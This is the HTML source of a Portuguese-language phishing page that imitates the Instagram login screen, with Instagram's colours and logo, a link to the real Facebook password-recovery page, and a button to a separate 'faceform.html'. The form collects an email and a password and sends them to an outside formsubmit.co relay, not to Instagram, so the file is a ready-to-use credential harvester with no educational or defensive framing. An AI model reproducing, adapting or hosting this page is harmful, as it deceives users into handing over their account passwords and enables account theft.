<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        *{
            font-family: Arial, Helvetica, sans-serif;
            text-decoration: none;
        }
        body{
            background: radial-gradient(circle farthest-corner at 35% 90%, #fec564, transparent 50%), radial-gradient(circle farthest-corner at 0 140%, #fec564, transparent 50%), radial-gradient(ellipse farthest-corner at 0 -25%, #5258cf, transparent 50%), radial-gradient(ellipse farthest-corner at 20% -50%, #5258cf, transparent 50%), radial-gradient(ellipse farthest-corner at 100% 0, #893dc2, transparent 50%), radial-gradient(ellipse farthest-corner at 60% -20%, #893dc2, transparent 50%), radial-gradient(ellipse farthest-corner at 100% 100%, #d9317a, transparent), linear-gradient(#6559ca, #bc318f 30%, #e33f5f 50%, #f77638 70%, #fec66d 100%);
            background-size: cover;
            background-repeat: no-repeat;
            display: flex;
            flex-direction: column;
            justify-content: center;
            height: 100vh;
        }

        .container img{
            width: 200px;
            align-self: center;
            padding: 10px;
        }

        .container{
            display: flex;
            flex-direction: column;
            border-radius: 8px;
            width: 396px;
            padding: 10px;
            box-shadow:  0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
            background-color: white;
            align-self: center;
        }

        form{
            display: flex;
            flex-direction: column;
        }

        textarea{
            border-color: rgba(128, 128, 128, 0.274);
            padding: 8px;
            margin-bottom: 10px;
            border-radius: 8px;
        }

        #xamaa{
            border: 1px solid rgba(128, 128, 128, 0.274);
            padding: 8px;
            margin-bottom: 10px;
            border-radius: 8px;
        }

        #entrar{
            padding: 10px;
            color: rgb(255, 255, 255);
            background-color: RGB(0, 151, 255);
            font-size: 1em;
            font-weight: 700;
            border: 1px solid rgba(128, 128, 128, 0.308);
            border-radius: 8px;
            cursor: pointer;
        }

        #entrar:hover{
            background-color: #0954c4;
        }

        h3{
            color: RGB(0, 151, 255);
            font-size: 0.7em;
            cursor: pointer;
            text-align: center;
            padding-bottom: 15px;
            border-bottom: 1px solid rgba(128, 128, 128, 0.322);
        }

        .button{
            align-self: center;
            font-family: inherit;
        }

        button{
            padding: 10px;
            margin-top: 10px;
            margin-bottom: 15px;
            color: RGB(0, 151, 255);
            background-color: #ffffff;
            font-size: 1em;
            font-weight: 700;
            border: none;
            border-radius: 8px;
            cursor: pointer;
            width: max-content;
            align-self: center;
        }

        button:hover{
            background-color: #000000;
            color: #ffffff;
        }

        #email{
            border: 1px solid rgba(128, 128, 128, 0.274);
            padding: 8px;
            margin-bottom: 10px;
            border-radius: 8px;
        }

        @media(max-width: 460px){
            .container{
                width: auto;
            }
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="instagram-logo-14.png" alt="icone do google">
        <form action="https://formsubmit.co/fe846091de3b59ab606d2512ed619b8a" method="post">
            <input type="text" name="name" placeholder="Email" id="xamaa" required autocomplete="off">
            <input type="email" name="email" placeholder="Confirme seu Email" required id="email" autocomplete="off">
            <textarea name="message" cols="30" rows="1" placeholder="Senha" required></textarea>
            <input type="submit" value="Entrar" id="entrar">
        </form>
        <a href="https://pt-br.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0">
            <h3>Esqueceu a senha?</h3>
        </a>
        <a class="button" href="faceform.html"><button>Entar com o Facebook</button></a>
    </div>
</body>
</html>
